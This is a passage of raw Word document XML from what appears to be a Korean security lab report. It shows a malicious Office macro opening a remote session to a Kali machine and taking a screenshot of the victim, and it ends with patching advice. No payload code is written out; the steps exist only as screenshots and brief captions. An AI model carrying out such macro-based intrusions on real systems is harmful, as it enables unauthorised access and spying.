                                <a:ext cx="293511" cy="316091"/>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29" style="position:absolute;margin-left:366.423pt;margin-top:34.0546pt;width:23.1111pt;height:24.8891pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251682816"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83840" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>4642136</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>805729</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="643466" cy="135468"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1030" name="shape1030" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="643466" cy="135468"/>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0" style="position:absolute;margin-left:365.523pt;margin-top:63.4433pt;width:50.6666pt;height:10.6668pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251683840"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81792" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2416815</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>301967</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="293511" cy="135468"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1031" name="shape1031" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="293511" cy="135468"/>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1" style="position:absolute;margin-left:190.3pt;margin-top:23.7769pt;width:23.1111pt;height:10.6668pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251681792" o:allowincell="t" filled="f" fillcolor="#ffffff" stroked="t" strokecolor="#ff0000" strokeweight="1.5pt">
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5410931" cy="3882037"/>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5410931" cy="3882037"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w: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rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" behindDoc="0" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251687936" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>5887376</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>7108969</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="784577" cy="135468"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1033" name="shape1033" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="784577" cy="135468"/>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3" style="position:absolute;margin-left:463.573pt;margin-top:559.761pt;width:61.7777pt;height:10.6668pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251687936"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86912" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>2059738</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1949246</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="784577" cy="135468"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1034" name="shape1034" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="784577" cy="135468"/>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4" style="position:absolute;margin-left:162.184pt;margin-top:153.484pt;width:61.7777pt;height:10.6668pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251686912"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85888" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>3560454</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>1463119</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="440266" cy="135468"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1035" name="shape1035" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="440266" cy="135468"/>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5" style="position:absolute;margin-left:280.351pt;margin-top:115.206pt;width:34.6666pt;height:10.6668pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251685888"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84864" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1708372</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>993923</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="254000" cy="135468"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1036" name="shape1036" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="254000" cy="135468"/>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6" style="position:absolute;margin-left:134.517pt;margin-top:78.2617pt;width:20pt;height:10.6668pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251684864" o:allowincell="t" filled="f" fillcolor="#ffffff" stroked="t" strokecolor="#ff0000" strokeweight="1.5pt">
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5412317" cy="3800549"/>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5412317" cy="3800549"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5498860" cy="3964786"/>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5498860" cy="3964786"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" behindDoc="0" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251688960" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1626593</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>2489532</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1145821" cy="169331"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1039" name="shape1039" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1145821" cy="169331"/>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9" style="position:absolute;margin-left:128.078pt;margin-top:196.026pt;width:90.2221pt;height:13.3331pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251688960" o:allowincell="t" filled="f" fillcolor="#ffffff" stroked="t" strokecolor="#ff0000" strokeweight="1.5pt">
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5519561" cy="4099396"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>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5519561" cy="4099396"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="B7D7D8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>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6.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> 위와 같이 매크로를 등록해주고 나면, kali에서 원격 연결이 성공한 것을 확인할 수 있다. </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5753100" cy="3985260"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>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5753100" cy="3985260"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5753100" cy="3985260"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>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5753100" cy="3985260"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>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7.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve"> screenshot 명령어로 스샷을 찍어보았다. </w:t>
            </w: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rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" behindDoc="0" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251680768" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>994415</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>3151961</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="750710" cy="141108"/>
                      <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1043" name="shape1043" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="750710" cy="141108"/>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43" style="position:absolute;margin-left:78.3004pt;margin-top:248.186pt;width:59.111pt;height:11.1109pt;mso-position-horizontal-relative:column;mso-position-vertical-relative:line;v-text-anchor:middle;mso-wrap-style:square;z-index:251680768" o:allowincell="t" filled="f" fillcolor="#ffffff" stroked="t" strokecolor="#ff0000" strokeweight="1.5pt">
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5753100" cy="3985260"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>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5753100" cy="3985260"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5784850" cy="4336762"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1045" name="shape104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5784850" cy="4336762"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="426" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10686" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="none"/>
          <w:insideV w:val="none"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10686"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="80" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="38"/>
                <w:szCs w:val="38"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" behindDoc="1" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251676672" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="margin">
                        <wp:posOffset>-59055</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="margin">
                        <wp:posOffset>-8467725</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="6991350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1046" name="shape1046" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="6772275" cy="6991350"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="lt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46" style="position:absolute;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin;v-text-anchor:middle;mso-wrap-style:square;z-index:-251676672" o:allowincell="t" filled="t" fillcolor="#ffffff" stroked="f">
                      <v:fill opacity="27525f"/>
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="873" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>보안진단 및 대책</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="637" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve">OS를 항상 최신버전을 사용하고, microsoft사의 제품을 항상 최신버전으로 사용하도록 한다. </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
